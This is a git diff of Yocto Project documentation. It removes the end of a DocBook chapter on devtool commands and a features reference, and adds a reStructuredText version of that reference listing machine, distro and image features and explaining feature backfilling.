-                If dependent packages (e.g. libraries) do not exist on the target,
-                your application, when run, will fail to find those functions.
-                For more information, see the
-                "<link linkend='devtool-deploying-your-software-on-the-target-machine'>Deploying Your Software on the Target Machine</link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            By default, <filename>devtool add</filename> uses the latest
-            revision (i.e. master) when unpacking files from a remote URI.
-            In some cases, you might want to specify a source revision by
-            branch, tag, or commit hash. You can specify these options when
-            using the <filename>devtool add</filename> command:
-            <itemizedlist>
-                <listitem><para>
-                    To specify a source branch, use the
-                    <filename>--srcbranch</filename> option:
-                    <literallayout class='monospaced'>
-     $ devtool add --srcbranch &DISTRO_NAME_NO_CAP; jackson /home/<replaceable>user</replaceable>/sources/jackson
-                    </literallayout>
-                    In the previous example, you are checking out the
-                    &DISTRO_NAME_NO_CAP; branch.
-                    </para></listitem>
-                <listitem><para>
-                    To specify a specific tag or commit hash, use the
-                    <filename>--srcrev</filename> option:
-                    <literallayout class='monospaced'>
-     $ devtool add --srcrev &DISTRO_REL_TAG; jackson /home/<replaceable>user</replaceable>/sources/jackson
-     $ devtool add --srcrev <replaceable>some_commit_hash</replaceable> /home/<replaceable>user</replaceable>/sources/jackson
-                    </literallayout>
-                    The previous examples check out the &DISTRO_REL_TAG; tag
-                    and the commit associated with the
-                    <replaceable>some_commit_hash</replaceable> hash.
-                    </para></listitem>
-            </itemizedlist>
-            <note>
-                If you prefer to use the latest revision every time the recipe is
-                built, use the options <filename>--autorev</filename>
-                or <filename>-a</filename>.
-            </note>
-        </para>
-    </section>
-
-    <section id='devtool-extracting-the-source-for-an-existing-recipe'>
-        <title>Extracting the Source for an Existing Recipe</title>
-
-        <para>
-            Use the <filename>devtool extract</filename> command to
-            extract the source for an existing recipe.
-            When you use this command, you must supply the root name
-            of the recipe (i.e. no version, paths, or extensions), and
-            you must supply the directory to which you want the source
-            extracted.
-        </para>
-
-        <para>
-            Additional command options let you control the name of a
-            development branch into which you can checkout the source
-            and whether or not to keep a temporary directory, which is
-            useful for debugging.
-        </para>
-    </section>
-
-    <section id='devtool-synchronizing-a-recipes-extracted-source-tree'>
-        <title>Synchronizing a Recipe's Extracted Source Tree</title>
-
-        <para>
-            Use the <filename>devtool sync</filename> command to
-            synchronize a previously extracted source tree for an
-            existing recipe.
-            When you use this command, you must supply the root name
-            of the recipe (i.e. no version, paths, or extensions), and
-            you must supply the directory to which you want the source
-            extracted.
-        </para>
-
-        <para>
-            Additional command options let you control the name of a
-            development branch into which you can checkout the source
-            and whether or not to keep a temporary directory, which is
-            useful for debugging.
-        </para>
-    </section>
-
-    <section id='devtool-modifying-a-recipe'>
-        <title>Modifying an Existing Recipe</title>
-
-        <para>
-            Use the <filename>devtool modify</filename> command to begin
-            modifying the source of an existing recipe.
-            This command is very similar to the
-            <link linkend='devtool-adding-a-new-recipe-to-the-workspace'><filename>add</filename></link>
-            command except that it does not physically create the
-            recipe in the workspace layer because the recipe already
-            exists in an another layer.
-        </para>
-
-        <para>
-            The <filename>devtool modify</filename> command extracts the
-            source for a recipe, sets it up as a Git repository if the
-            source had not already been fetched from Git, checks out a
-            branch for development, and applies any patches from the recipe
-            as commits on top.
-            You can use the following command to checkout the source
-            files:
-            <literallayout class='monospaced'>
-     $ devtool modify <replaceable>recipe</replaceable>
-            </literallayout>
-            Using the above command form, <filename>devtool</filename> uses
-            the existing recipe's
-            <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-            statement to locate the upstream source, extracts the source
-            into the default sources location in the workspace.
-            The default development branch used is "devtool".
-        </para>
-    </section>
-
-    <section id='devtool-edit-an-existing-recipe'>
-        <title>Edit an Existing Recipe</title>
-
-        <para>
-            Use the <filename>devtool edit-recipe</filename> command
-            to run the default editor, which is identified using the
-            <filename>EDITOR</filename> variable, on the specified recipe.
-        </para>
-
-        <para>
-            When you use the <filename>devtool edit-recipe</filename>
-            command, you must supply the root name of the recipe
-            (i.e. no version, paths, or extensions).
-            Also, the recipe file itself must reside in the workspace
-            as a result of the <filename>devtool add</filename> or
-            <filename>devtool upgrade</filename> commands.
-            However, you can override that requirement by using the
-            "-a" or "--any-recipe" option.
-            Using either of these options allows you to edit any recipe
-            regardless of its location.
-        </para>
-    </section>
-
-    <section id='devtool-updating-a-recipe'>
-        <title>Updating a Recipe</title>
-
-        <para>
-            Use the <filename>devtool update-recipe</filename> command to
-            update your recipe with patches that reflect changes you make
-            to the source files.
-            For example, if you know you are going to work on some
-            code, you could first use the
-            <link linkend='devtool-modifying-a-recipe'><filename>devtool modify</filename></link>
-            command to extract the code and set up the workspace.
-            After which, you could modify, compile, and test the code.
-        </para>
-
-        <para>
-            When you are satisfied with the results and you have committed
-            your changes to the Git repository, you can then
-            run the <filename>devtool update-recipe</filename> to create the
-            patches and update the recipe:
-            <literallayout class='monospaced'>
-     $ devtool update-recipe <replaceable>recipe</replaceable>
-            </literallayout>
-            If you run the <filename>devtool update-recipe</filename>
-            without committing your changes, the command ignores the
-            changes.
-        </para>
-
-        <para>
-            Often, you might want to apply customizations made to your
-            software in your own layer rather than apply them to the
-            original recipe.
-            If so, you can use the
-            <filename>-a</filename> or <filename>--append</filename>
-            option with the <filename>devtool update-recipe</filename>
-            command.
-            These options allow you to specify the layer into which to
-            write an append file:
-            <literallayout class='monospaced'>
-     $ devtool update-recipe <replaceable>recipe</replaceable> -a <replaceable>base-layer-directory</replaceable>
-            </literallayout>
-            The <filename>*.bbappend</filename> file is created at the
-            appropriate path within the specified layer directory, which
-            may or may not be in your <filename>bblayers.conf</filename>
-            file.
-            If an append file already exists, the command updates it
-            appropriately.
-        </para>
-    </section>
-
-    <section id='devtool-checking-on-the-upgrade-status-of-a-recipe'>
-        <title>Checking on the Upgrade Status of a Recipe</title>
-
-        <para>
-            Upstream recipes change over time.
-            Consequently, you might find that you need to determine if you
-            can upgrade a recipe to a newer version.
-        </para>
-
-        <para>
-            To check on the upgrade status of a recipe, use the
-            <filename>devtool check-upgrade-status</filename> command.
-            The command displays a table of your current recipe versions,
-            the latest upstream versions, the email address of the recipe's
-            maintainer, and any additional information such as commit hash
-            strings and reasons you might not be able to upgrade a particular
-            recipe.
-            <note><title>NOTES:</title>
-                <itemizedlist>
-                    <listitem><para>
-                        For the <filename>oe-core</filename> layer, recipe
-                        maintainers come from the
-                        <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/distro/include/maintainers.inc'><filename>maintainers.inc</filename></ulink>
-                        file.
-                        </para></listitem>
-                    <listitem><para>
-                        If the recipe is using the
-                        <ulink url='&YOCTO_DOCS_BB_URL;#git-fetcher'>Git fetcher</ulink>
-                        rather than a tarball, the commit hash points to the
-                        commit that matches the recipe's latest version tag.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            As with all <filename>devtool</filename> commands, you can get
-            help on the individual command:
-            <literallayout class='monospaced'>
-     $ devtool check-upgrade-status -h
-     NOTE: Starting bitbake server...
-     usage: devtool check-upgrade-status [-h] [--all] [recipe [recipe ...]]
-
-     Prints a table of recipes together with versions currently provided by
-     recipes, and latest upstream versions, when there is a later version available
-
-     arguments:
-       recipe      Name of the recipe to report (omit to report upgrade info for
-                   all recipes)
-
-     options:
-      -h, --help  show this help message and exit
-       --all, -a   Show all recipes, not just recipes needing upgrade
-            </literallayout>
-        </para>
-
-        <para>
-            Unless you provide a specific recipe name on the command line,
-            the command checks all recipes in all configured layers.
-        </para>
-
-        <para>
-            Following is a partial example table that reports on all the
-            recipes.
-            Notice the reported reason for not upgrading the
-            <filename>base-passwd</filename> recipe.
-            In this example, while a new version is available upstream,
-            you do not want to use it because the dependency on
-            <filename>cdebconf</filename> is not easily satisfied.
-            <note>
-                When a reason for not upgrading displays, the reason is
-                usually written into the recipe using the
-                <filename>RECIPE_NO_UPDATE_REASON</filename> variable.
-                See the
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb'><filename>base-passwd.bb</filename></ulink>
-                recipe for an example.
-            </note>
-            <literallayout class='monospaced'>
-     $ devtool check-upgrade-status
-         ...
-         NOTE: acpid                     2.0.30          2.0.31
-     Ross Burton &lt;ross.burton@intel.com&gt;
-         NOTE: u-boot-fw-utils           2018.11         2019.01
-     Marek Vasut &lt;marek.vasut@gmail.com&gt;
-     d3689267f92c5956e09cc7d1baa4700141662bff
-         NOTE: u-boot-tools              2018.11         2019.01
-     Marek Vasut &lt;marek.vasut@gmail.com&gt;
-     d3689267f92c5956e09cc7d1baa4700141662bff
-          .
-          .
-          .
-         NOTE: base-passwd               3.5.29          3.5.45
-     Anuj Mittal &lt;anuj.mittal@intel.com&gt;  cannot be updated due to: Version
-     3.5.38 requires cdebconf for update-passwd utility
-         NOTE: busybox                   1.29.2          1.30.0
-     Andrej Valek &lt;andrej.valek@siemens.com&gt;
-         NOTE: dbus-test                 1.12.10         1.12.12
-     Chen Qi &lt;Qi.Chen@windriver.com&gt;
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-upgrading-a-recipe'>
-        <title>Upgrading a Recipe</title>
-
-        <para>
-            As software matures, upstream recipes are upgraded to newer
-            versions.
-            As a developer, you need to keep your local recipes up-to-date
-            with the upstream version releases.
-            Several methods exist by which you can upgrade recipes.
-            You can read about them in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-upgrading-recipes'>Upgrading Recipes</ulink>"
-            section of the Yocto Project Development Tasks Manual.
-            This section overviews the <filename>devtool upgrade</filename>
-            command.
-            <note>
-                Before you upgrade a recipe, you can check on its upgrade
-                status.
-                See the
-                "<link linkend='devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</link>"
-                for more information.
-            </note>
-        </para>
-
-        <para>
-            The <filename>devtool upgrade</filename> command
-            upgrades an existing recipe to a more recent version of the
-            recipe upstream.
-            The command puts the upgraded recipe file along with any associated
-            files into a "workspace" and, if necessary, extracts the source
-            tree to a specified location.
-            During the upgrade, patches associated with the recipe are
-            rebased or added as needed.
-        </para>
-
-        <para>
-            When you use the <filename>devtool upgrade</filename> command,
-            you must supply the root name of the recipe (i.e. no version,
-            paths, or extensions), and you must supply the directory
-            to which you want the source extracted.
-            Additional command options let you control things such as
-            the version number to which you want to upgrade (i.e. the
-            <link linkend='var-PV'><filename>PV</filename></link>),
-            the source revision to which you want to upgrade (i.e. the
-            <link linkend='var-SRCREV'><filename>SRCREV</filename></link>),
-            whether or not to apply patches, and so forth.
-        </para>
-
-        <para>
-            You can read more on the <filename>devtool upgrade</filename>
-            workflow in the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software'>Use <filename>devtool upgrade</filename> to Create a Version of the Recipe that Supports a Newer Version of the Software</ulink>"
-            section in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-            You can also see an example of how to use
-            <filename>devtool upgrade</filename> in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#gs-using-devtool-upgrade'>Using <filename>devtool upgrade</filename></ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='devtool-resetting-a-recipe'>
-        <title>Resetting a Recipe</title>
-
-        <para>
-            Use the <filename>devtool reset</filename> command to remove a
-            recipe and its configuration (e.g. the corresponding
-            <filename>.bbappend</filename> file) from the workspace layer.
-            Realize that this command deletes the recipe and the
-            append file.
-            The command does not physically move them for you.
-            Consequently, you must be sure to physically relocate your
-            updated recipe and the append file outside of the workspace
-            layer before running the <filename>devtool reset</filename>
-            command.
-        </para>
-
-        <para>
-            If the <filename>devtool reset</filename> command detects that
-            the recipe or the append files have been modified, the
-            command preserves the modified files in a separate "attic"
-            subdirectory under the workspace layer.
-        </para>
-
-        <para>
-            Here is an example that resets the workspace directory that
-            contains the <filename>mtr</filename> recipe:
-            <literallayout class='monospaced'>
-     $ devtool reset mtr
-     NOTE: Cleaning sysroot for recipe mtr...
-     NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/mtr as-is; if you no
-        longer need it then please delete it manually
-     $
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-building-your-recipe'>
-        <title>Building Your Recipe</title>
-
-        <para>
-            Use the <filename>devtool build</filename> command to build your
-            recipe.
-            The <filename>devtool build</filename> command is equivalent to
-            the <filename>bitbake -c populate_sysroot</filename> command.
-        </para>
-
-        <para>
-            When you use the <filename>devtool build</filename> command,
-            you must supply the root name of the recipe (i.e. do not provide
-            versions, paths, or extensions).
-            You can use either the "-s" or the "--disable-parallel-make"
-            options to disable parallel makes during the build.
-            Here is an example:
-            <literallayout class='monospaced'>
-     $ devtool build <replaceable>recipe</replaceable>
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-building-your-image'>
-        <title>Building Your Image</title>
-
-        <para>
-            Use the <filename>devtool build-image</filename> command
-            to build an image, extending it to include packages from
-            recipes in the workspace.
-            Using this command is useful when you want an image that
-            ready for immediate deployment onto a device for testing.
-            For proper integration into a final image, you need to
-            edit your custom image recipe appropriately.
-        </para>
-
-        <para>
-            When you use the <filename>devtool build-image</filename>
-            command, you must supply the name of the image.
-            This command has no command line options:
-            <literallayout class='monospaced'>
-     $ devtool build-image <replaceable>image</replaceable>
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-deploying-your-software-on-the-target-machine'>
-        <title>Deploying Your Software on the Target Machine</title>
-
-        <para>
-            Use the <filename>devtool deploy-target</filename> command to
-            deploy the recipe's build output to the live target machine:
-            <literallayout class='monospaced'>
-     $ devtool deploy-target <replaceable>recipe</replaceable>&nbsp;<replaceable>target</replaceable>
-            </literallayout>
-            The <replaceable>target</replaceable> is the address of the
-            target machine, which must be running an SSH server (i.e.
-            <filename>user@hostname[:destdir]</filename>).
-        </para>
-
-        <para>
-            This command deploys all files installed during the
-            <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-            task.
-            Furthermore, you do not need to have package management enabled
-            within the target machine.
-            If you do, the package manager is bypassed.
-            <note><title>Notes</title>
-                <para>
-                    The <filename>deploy-target</filename>
-                    functionality is for development only.
-                    You should never use it to update an image that will be
-                    used in production.
-                </para>
-            </note>
-        </para>
-
-        <para>
-            Some conditions exist that could prevent a deployed application
-            from behaving as expected.
-            When both of the following conditions exist, your application has
-            the potential to not behave correctly when run on the target:
-            <itemizedlist>
-                <listitem><para>
-                    You are deploying a new application to the target and
-                    the recipe you used to build the application had
-                    correctly defined runtime dependencies.
-                    </para></listitem>
-                <listitem><para>
-                    The target does not physically have the packages on which
-                    the application depends installed.
-                    </para></listitem>
-            </itemizedlist>
-            If both of these conditions exist, your application will not
-            behave as expected.
-            The reason for this misbehavior is because the
-            <filename>devtool deploy-target</filename> command does not deploy
-            the packages (e.g. libraries) on which your new application
-            depends.
-            The assumption is that the packages are already on the target.
-            Consequently, when a runtime call is made in the application
-            for a dependent function (e.g. a library call), the function
-            cannot be found.
-        </para>
-
-        <para>
-            To be sure you have all the dependencies local to the target, you
-            need to be sure that the packages are pre-deployed (installed)
-            on the target before attempting to run your application.
-        </para>
-    </section>
-
-    <section id='devtool-removing-your-software-from-the-target-machine'>
-        <title>Removing Your Software from the Target Machine</title>
-
-        <para>
-            Use the <filename>devtool undeploy-target</filename> command to
-            remove deployed build output from the target machine.
-            For the <filename>devtool undeploy-target</filename> command to
-            work, you must have previously used the
-            <link linkend='devtool-deploying-your-software-on-the-target-machine'><filename>devtool deploy-target</filename></link>
-            command.
-            <literallayout class='monospaced'>
-     $ devtool undeploy-target <replaceable>recipe</replaceable>&nbsp;<replaceable>target</replaceable>
-            </literallayout>
-            The <replaceable>target</replaceable> is the address of the
-            target machine, which must be running an SSH server (i.e.
-            <filename>user@hostname</filename>).
-        </para>
-    </section>
-
-    <section id='devtool-creating-the-workspace'>
-        <title>Creating the Workspace Layer in an Alternative Location</title>
-
-        <para>
-            Use the <filename>devtool create-workspace</filename> command to
-            create a new workspace layer in your
-            <link linkend='build-directory'>Build Directory</link>.
-            When you create a new workspace layer, it is populated with the
-            <filename>README</filename> file and the
-            <filename>conf</filename> directory only.
-        </para>
-
-        <para>
-            The following example creates a new workspace layer in your
-            current working and by default names the workspace layer
-            "workspace":
-            <literallayout class='monospaced'>
-     $ devtool create-workspace
-            </literallayout>
-        </para>
-
-        <para>
-            You can create a workspace layer anywhere by supplying
-            a pathname with the command.
-            The following command creates a new workspace layer named
-            "new-workspace":
-            <literallayout class='monospaced'>
-     $ devtool create-workspace /home/scottrif/new-workspace
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-get-the-status-of-the-recipes-in-your-workspace'>
-        <title>Get the Status of the Recipes in Your Workspace</title>
-
-        <para>
-            Use the <filename>devtool status</filename> command to
-            list the recipes currently in your workspace.
-            Information includes the paths to their respective
-            external source trees.
-        </para>
-
-        <para>
-            The <filename>devtool status</filename> command has no
-            command-line options:
-            <literallayout class='monospaced'>
-     $ devtool status
-            </literallayout>
-            Following is sample output after using
-            <link linkend='devtool-adding-a-new-recipe-to-the-workspace'><filename>devtool add</filename></link>
-            to create and add the <filename>mtr_0.86.bb</filename> recipe
-            to the <filename>workspace</filename> directory:
-            <literallayout class='monospaced'>
-     $ devtool status
-     mtr: /home/scottrif/poky/build/workspace/sources/mtr (/home/scottrif/poky/build/workspace/recipes/mtr/mtr_0.86.bb)
-     $
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-search-for-available-target-recipes'>
-        <title>Search for Available Target Recipes</title>
-
-        <para>
-            Use the <filename>devtool search</filename> command to
-            search for available target recipes.
-            The command matches the recipe name, package name,
-            description, and installed files.
-            The command displays the recipe name as a result of a
-            match.
-        </para>
-
-        <para>
-            When you use the <filename>devtool search</filename> command,
-            you must supply a <replaceable>keyword</replaceable>.
-            The command uses the <replaceable>keyword</replaceable> when
-            searching for a match.
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-features.rst b/documentation/ref-manual/ref-features.rst
new file mode 100644
index 0000000000..be3a9e3a3e
--- /dev/null
+++ b/documentation/ref-manual/ref-features.rst
@@ -0,0 +1,352 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+********
+Features
+********
+
+This chapter provides a reference of shipped machine and distro features
+you can include as part of your image, a reference on image features you
+can select, and a reference on feature backfilling.
+
+Features provide a mechanism for working out which packages should be
+included in the generated images. Distributions can select which
+features they want to support through the ``DISTRO_FEATURES`` variable,
+which is set or appended to in a distribution's configuration file such
+as ``poky.conf``, ``poky-tiny.conf``, ``poky-lsb.conf`` and so forth.
+Machine features are set in the ``MACHINE_FEATURES`` variable, which is
+set in the machine configuration file and specifies the hardware
+features for a given machine.
+
+These two variables combine to work out which kernel modules, utilities,
+and other packages to include. A given distribution can support a
+selected subset of features so some machine features might not be
+included if the distribution itself does not support them.
+
+One method you can use to determine which recipes are checking to see if
+a particular feature is contained or not is to ``grep`` through the
+:term:`Metadata` for the feature. Here is an example that
+discovers the recipes whose build is potentially changed based on a
+given feature:
+::
+
+   $ cd poky
+   $ git grep 'contains.*MACHINE_FEATURES.*feature'
+
+.. _ref-features-machine:
+
+Machine Features
+================
+
+The items below are features you can use with
+:term:`MACHINE_FEATURES`. Features do not have a
+one-to-one correspondence to packages, and they can go beyond simply
+controlling the installation of a package or packages. Sometimes a
+feature can influence how certain recipes are built. For example, a
+feature might determine whether a particular configure option is
+specified within the :ref:`ref-tasks-configure` task
+for a particular recipe.
+
+This feature list only represents features as shipped with the Yocto
+Project metadata:
+
+-  *acpi:* Hardware has ACPI (x86/x86_64 only)
+
+-  *alsa:* Hardware has ALSA audio drivers
+
+-  *apm:* Hardware uses APM (or APM emulation)
+
+-  *bluetooth:* Hardware has integrated BT
+
+-  *efi:* Support for booting through EFI
+
+-  *ext2:* Hardware HDD or Microdrive
+
+-  *keyboard:* Hardware has a keyboard
+
+-  *numa:* Hardware has non-uniform memory access
+
+-  *pcbios:* Support for booting through BIOS
+
+-  *pci:* Hardware has a PCI bus
+
+-  *pcmcia:* Hardware has PCMCIA or CompactFlash sockets
+
+-  *phone:* Mobile phone (voice) support
+
+-  *qvga:* Machine has a QVGA (320x240) display
+
+-  *rtc:* Machine has a Real-Time Clock
+
+-  *screen:* Hardware has a screen
+
+-  *serial:* Hardware has serial support (usually RS232)
+
+-  *touchscreen:* Hardware has a touchscreen
+
+-  *usbgadget:* Hardware is USB gadget device capable
+
+-  *usbhost:* Hardware is USB Host capable
+
+-  *vfat:* FAT file system support
+
+-  *wifi:* Hardware has integrated WiFi
+
+.. _ref-features-distro:
+
+Distro Features
+===============
+
+The items below are features you can use with
+:term:`DISTRO_FEATURES` to enable features across
+your distribution. Features do not have a one-to-one correspondence to
+packages, and they can go beyond simply controlling the installation of
+a package or packages. In most cases, the presence or absence of a
+feature translates to the appropriate option supplied to the configure
+script during the :ref:`ref-tasks-configure` task for
+the recipes that optionally support the feature.
+
+Some distro features are also machine features. These select features
+make sense to be controlled both at the machine and distribution
+configuration level. See the
+:term:`COMBINED_FEATURES` variable for more
+information.
+
+This list only represents features as shipped with the Yocto Project
+metadata:
+
+-  *alsa:* Include ALSA support (OSS compatibility kernel modules
+   installed if available).
+
+-  *api-documentation:* Enables generation of API documentation during
+   recipe builds. The resulting documentation is added to SDK tarballs
+   when the ``bitbake -c populate_sdk`` command is used. See the
+   ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding api documentation to the standard sdk`"
+   section in the Yocto Project Application Development and the
+   Extensible Software Development Kit (eSDK) manual.
+
+-  *bluetooth:* Include bluetooth support (integrated BT only).
+
+-  *cramfs:* Include CramFS support.
+
+-  *directfb:* Include DirectFB support.
+
+-  *ext2:* Include tools for supporting for devices with internal
+   HDD/Microdrive for storing files (instead of Flash only devices).
+
+-  *ipsec:* Include IPSec support.
+
+-  *ipv6:* Include IPv6 support.
+
+-  *keyboard:* Include keyboard support (e.g. keymaps will be loaded
+   during boot).
+
+-  *ldconfig:* Include support for ldconfig and ``ld.so.conf`` on the
+   target.
+
+-  *nfs:* Include NFS client support (for mounting NFS exports on
+   device).
+
+-  *opengl:* Include the Open Graphics Library, which is a
+   cross-language, multi-platform application programming interface used
+   for rendering two and three-dimensional graphics.
+
+-  *pci:* Include PCI bus support.
+
+-  *pcmcia:* Include PCMCIA/CompactFlash support.
+
+-  *ppp:* Include PPP dialup support.
+
+-  *ptest:* Enables building the package tests where supported by
+   individual recipes. For more information on package tests, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`" section
+   in the Yocto Project Development Tasks Manual.
+
+-  *smbfs:* Include SMB networks client support (for mounting
+   Samba/Microsoft Windows shares on device).
+
+-  *systemd:* Include support for this ``init`` manager, which is a full
+   replacement of for ``init`` with parallel starting of services,
+   reduced shell overhead, and other features. This ``init`` manager is
+   used by many distributions.
+
+-  *usbgadget:* Include USB Gadget Device support (for USB
+   networking/serial/storage).
+
+-  *usbhost:* Include USB Host support (allows to connect external
+   keyboard, mouse, storage, network etc).
+
+-  *usrmerge:* Merges the ``/bin``, ``/sbin``, ``/lib``, and ``/lib64``
+   directories into their respective counterparts in the ``/usr``
+   directory to provide better package and application compatibility.
+
+-  *wayland:* Include the Wayland display server protocol and the
+   library that supports it.
+
+-  *wifi:* Include WiFi support (integrated only).
+
+-  *x11:* Include the X server and libraries.
+
+.. _ref-features-image:
+
+Image Features
+==============
+
+The contents of images generated by the OpenEmbedded build system can be
+controlled by the :term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES` variables that
+you typically configure in your image recipes. Through these variables,
+you can add several different predefined packages such as development
+utilities or packages with debug information needed to investigate
+application problems or profile applications.
+
+The following image features are available for all images:
+
+-  *allow-empty-password:* Allows Dropbear and OpenSSH to accept root
+   logins and logins from accounts having an empty password string.
+
+-  *dbg-pkgs:* Installs debug symbol packages for all packages installed
+   in a given image.
+
+-  *debug-tweaks:* Makes an image suitable for development (e.g. allows
+   root logins without passwords and enables post-installation logging).
+   See the 'allow-empty-password', 'empty-root-password', and
+   'post-install-logging' features in this list for additional
+   information.
+
+-  *dev-pkgs:* Installs development packages (headers and extra library
+   links) for all packages installed in a given image.
+
+-  *doc-pkgs:* Installs documentation packages for all packages
+   installed in a given image.
+
+-  *empty-root-password:* Sets the root password to an empty string,
+   which allows logins with a blank password.
+
+-  *package-management:* Installs package management tools and preserves
+   the package manager database.
+
+-  *post-install-logging:* Enables logging postinstall script runs to
+   the ``/var/log/postinstall.log`` file on first boot of the image on
+   the target system.
+
+   .. note::
+
+      To make the ``/var/log`` directory on the target persistent, use the
+      :term:`VOLATILE_LOG_DIR` variable by setting it to "no".
+
+-  *ptest-pkgs:* Installs ptest packages for all ptest-enabled recipes.
+
+-  *read-only-rootfs:* Creates an image whose root filesystem is
+   read-only. See the
+   ":ref:`dev-manual/dev-manual-common-tasks:creating a read-only root filesystem`"
+   section in the Yocto Project Development Tasks Manual for more
+   information.
+
+-  *splash:* Enables showing a splash screen during boot. By default,
+   this screen is provided by ``psplash``, which does allow
+   customization. If you prefer to use an alternative splash screen
+   package, you can do so by setting the ``SPLASH`` variable to a
+   different package name (or names) within the image recipe or at the
+   distro configuration level.
+
+-  *staticdev-pkgs:* Installs static development packages, which are
+   static libraries (i.e. ``*.a`` files), for all packages installed in
+   a given image.
+
+Some image features are available only when you inherit the
+:ref:`core-image <ref-classes-core-image>` class. The current list of
+these valid features is as follows:
+
+-  *hwcodecs:* Installs hardware acceleration codecs.
+
+-  *nfs-server:* Installs an NFS server.
+
+-  *perf:* Installs profiling tools such as ``perf``, ``systemtap``, and
+   ``LTTng``. For general information on user-space tools, see the
+   :doc:`../sdk-manual/sdk-manual` manual.
+
+-  *ssh-server-dropbear:* Installs the Dropbear minimal SSH server.
+
+-  *ssh-server-openssh:* Installs the OpenSSH SSH server, which is more
+   full-featured than Dropbear. Note that if both the OpenSSH SSH server
+   and the Dropbear minimal SSH server are present in
+   ``IMAGE_FEATURES``, then OpenSSH will take precedence and Dropbear
+   will not be installed.
+
+-  *tools-debug:* Installs debugging tools such as ``strace`` and
+   ``gdb``. For information on GDB, see the
+   ":ref:`platdev-gdb-remotedebug`" section
+   in the Yocto Project Development Tasks Manual. For information on
+   tracing and profiling, see the :doc:`../profile-manual/profile-manual`.
+
+-  *tools-sdk:* Installs a full SDK that runs on the device.
+
+-  *tools-testapps:* Installs device testing tools (e.g. touchscreen
+   debugging).
+
+-  *x11:* Installs the X server.
+
+-  *x11-base:* Installs the X server with a minimal environment.
+
+-  *x11-sato:* Installs the OpenedHand Sato environment.
+
+.. _ref-features-backfill:
+
+Feature Backfilling
+===================
+
+Sometimes it is necessary in the OpenEmbedded build system to extend
+:term:`MACHINE_FEATURES` or
+:term:`DISTRO_FEATURES` to control functionality
+that was previously enabled and not able to be disabled. For these
+cases, we need to add an additional feature item to appear in one of
+these variables, but we do not want to force developers who have
+existing values of the variables in their configuration to add the new
+feature in order to retain the same overall level of functionality.
+Thus, the OpenEmbedded build system has a mechanism to automatically
+"backfill" these added features into existing distro or machine
+configurations. You can see the list of features for which this is done
+by finding the
+:term:`DISTRO_FEATURES_BACKFILL` and
+:term:`MACHINE_FEATURES_BACKFILL`
+variables in the ``meta/conf/bitbake.conf`` file.
+
+Because such features are backfilled by default into all configurations
+as described in the previous paragraph, developers who wish to disable
+the new features need to be able to selectively prevent the backfilling
+from occurring. They can do this by adding the undesired feature or
+features to the
+:term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`
+or
+:term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`
+variables for distro features and machine features respectively.
+
+Here are two examples to help illustrate feature backfilling:
+
+-  *The "pulseaudio" distro feature option*: Previously, PulseAudio
+   support was enabled within the Qt and GStreamer frameworks. Because
+   of this, the feature is backfilled and thus enabled for all distros
+   through the ``DISTRO_FEATURES_BACKFILL`` variable in the
+   ``meta/conf/bitbake.conf`` file. However, your distro needs to
+   disable the feature. You can disable the feature without affecting
+   other existing distro configurations that need PulseAudio support by
+   adding "pulseaudio" to ``DISTRO_FEATURES_BACKFILL_CONSIDERED`` in
+   your distro's ``.conf`` file. Adding the feature to this variable
+   when it also exists in the ``DISTRO_FEATURES_BACKFILL`` variable
+   prevents the build system from adding the feature to your
+   configuration's ``DISTRO_FEATURES``, effectively disabling the
+   feature for that particular distro.
+
+-  *The "rtc" machine feature option*: Previously, real time clock (RTC)
+   support was enabled for all target devices. Because of this, the
+   feature is backfilled and thus enabled for all machines through the
+   ``MACHINE_FEATURES_BACKFILL`` variable in the
+   ``meta/conf/bitbake.conf`` file. However, your target device does not
+   have this capability. You can disable RTC support for your device
+   without affecting other machines that need RTC support by adding the
+   feature to your machine's ``MACHINE_FEATURES_BACKFILL_CONSIDERED``
+   list in the machine's ``.conf`` file. Adding the feature to this
+   variable when it also exists in the ``MACHINE_FEATURES_BACKFILL``
+   variable prevents the build system from adding the feature to your
+   configuration's ``MACHINE_FEATURES``, effectively disabling RTC
+   support for that particular machine.
diff --git a/documentation/ref-manual/ref-features.xml b/documentation/ref-manual/ref-features.xml
deleted file mode 100644
index 294b297c20..0000000000
--- a/documentation/ref-manual/ref-features.xml
+++ /dev/null
@@ -1,460 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-features'>
-    <title>Features</title>
-
-    <para>
-        This chapter provides a reference of shipped machine and distro features
-        you can include as part of your image, a reference on image features you can
-        select, and a reference on feature backfilling.
